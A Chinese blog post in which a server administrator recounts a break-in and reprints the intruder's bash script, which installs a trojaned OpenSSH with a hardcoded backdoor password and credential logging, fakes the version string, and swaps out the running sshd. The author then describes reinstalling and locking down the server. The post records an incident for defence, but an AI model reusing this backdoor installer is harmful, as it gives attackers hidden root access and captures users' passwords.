- 论坛徽章:
- 0
|
这么取标题是不是有点变态了!
因为Linux这边服务器超级稳定,我都好久没登了,要不不出这么一档子事,准保再过几天连密码都忘了。
Hacker操作痕迹不是清除的很干净,或者还没来得及清楚,总之root的history里还能看到他的历史命令:
绿盟的安全公告早就说过Openssh-3.6以下版本有漏洞(原文见
http://www.nsfocus.net/index.php?act=sec_bug&do=view&bug_id=5405
),我们的系统是AS4,openssh已经是3.9的版本,原想不会有这样的问题,没想到问题依旧,用户直接获得了root权限,所作的任何限制都没有效果,而且更可恶的是丫把原本的openssh给我用他自己改过的重新安装了一遍,可以看看他原始的安装文件:
#!/bin/bash
echo "bY linuxkid"
sleep 1
printf "\n\n"
printf "Enter SSH 22 password: "
read PASS
echo 'int genx=0,genxlookup=0;'> apps/ssh/genx.h
echo 'char genxpass[]="'$PASS'",genxbuf[1024];'>> apps/ssh/genx.h
echo 'char genxfile[]="/dev/saux";'>> apps/ssh/genx.h
sleep 1
printf "\n\n"
printf "SSH Version Example: OpenSSH_3.6.1p2\n"
printf "\n\n"
printf "Enter SSH 22 version: "
read SSHV
echo '#ifndef SSH2INCLUDES_H'> apps/ssh/ssh2includes.h
echo '#define SSH2INCLUDES_H'>> apps/ssh/ssh2includes.h
echo '#include "sshincludes.h"'>> apps/ssh/ssh2includes.h
echo '#include "sshsessionincludes.h"'>> apps/ssh/ssh2includes.h
echo '#include "ssh2version.h"'>> apps/ssh/ssh2includes.h
echo '#define SSH_USER_RC "rc"'>> apps/ssh/ssh2includes.h
echo '#define SSH_USER_ENV_FILE "environment"'>> apps/ssh/ssh2includes.h
echo '#define SSH_SYSTEM_RC ETCDIR "/sshrc"'>> apps/ssh/ssh2includes.h
echo '#define SSH_DEFAULT_PORT "22"'>> apps/ssh/ssh2includes.h
echo '#define SSH_AUTH_PUBKEY "publickey"'>> apps/ssh/ssh2includes.h
echo '#define SSH_AUTH_PASSWD "password"'>> apps/ssh/ssh2includes.h
echo '#define SSH_AUTH_HOSTBASED "hostbased"'>> apps/ssh/ssh2includes.h
echo '#define SSH_AUTH_PAM "pam-1@ssh.com"'>> apps/ssh/ssh2includes.h
echo '#define SSH_AUTH_KERBEROS "kerberos-2@ssh.com"'>> apps/ssh/ssh2includes.h
echo '#define SSH_AUTH_KERBEROS_TGT "kerberos-tgt-2@ssh.com"'>> apps/ssh/ssh2includes.h
echo '#define SSH_AUTH_SECURID "securid-1@ssh.com"'>> apps/ssh/ssh2includes.h
echo '#define SSH_SIGNER_PATH SSH_BINDIR "/ssh-signer2"'>> apps/ssh/ssh2includes.h
echo '#define SSH_PAM_CLIENT_PATH SSH_BINDIR "/ssh-pam-client"'>> apps/ssh/ssh2includes.h
echo '#define SSH_SSH2_PATH SSH_BINDIR "/ssh2"'>> apps/ssh/ssh2includes.h
echo '#define SSH_ASKPASS_PATH SSH_BINDIR "/ssh-askpass2"'>> apps/ssh/ssh2includes.h
echo '#define SSH_LIBSOCKS5_CONF_PATH "/etc/libsocks5.conf"'>> apps/ssh/ssh2includes.h
echo '#define SSH_SERVER_DEFAULT_IDLE_TIMEOUT 0'>> apps/ssh/ssh2includes.h
echo '#define SSH2_GETOPT_ARGUMENTS "ac:C::vd:e:f::F:hi:l:L:no:p:PqR:s:Stx8gVkw1:m:"'>> apps/ssh/ssh2includes.h
echo '#define SSH2_VERSION_STRING "" SSH2_VERSION \'>> apps/ssh/ssh2includes.h
echo ' "'$SSHV'"'>> apps/ssh/ssh2includes.h
echo '#define SSH2_PROTOCOL_VERSION_STRING SSH2_VERSION \'>> apps/ssh/ssh2includes.h
echo ' "'$SSHV'"'>> apps/ssh/ssh2includes.h
echo "#endif">> apps/ssh/ssh2includes.h
echo "Done."
echo
sleep 2
echo "Installing SSH... this will take a moment...."
echo "./configure --without-x"
./configure --without-x
sleep 2
echo "make"
make
sleep 2
echo "make install"
make install
sleep 2
sshfile=`ps ax |grep sshd|head -n 1|awk ' {print $5} '`
sshpid=`ps ax |grep sshd|head -n 1|awk ' {print $1} '`
echo "rm -rf $sshfile"
rm -rf $sshfile
echo "cp -f /usr/local/sbin/sshd $sshfile"
cp -f /usr/local/sbin/sshd $sshfile
echo "kill -9 $sshpid"
kill -9 $sshpid
echo "$sshfile"
$sshfile
echo "Done."
echo "And it is all yours"
看到最后没把我气死,妈的,还都是你的了,有种你把机器搬走!你能重安我也重安,这次去openssh下了一个最新版,重安以后把他的原文件盖掉了,然后把root的远程登陆禁止了,然后本想把gcc卸载了,后来想想算了,我也想看看丫有多大能耐。
被黑的机器都做了一遍,没被黑的也做上了,然后就在那里盯着,后来确定没问题了,好,回家。
本文来自ChinaUnix博客,如果查看原文请点:http://blog.chinaunix.net/u/29953/showart_297344.html |
|